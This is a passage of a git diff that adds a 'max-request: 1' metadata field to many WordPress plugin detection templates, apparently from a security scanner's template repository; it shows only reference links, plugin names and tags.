+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 6f06b49011..1c16a72d76 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
+    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
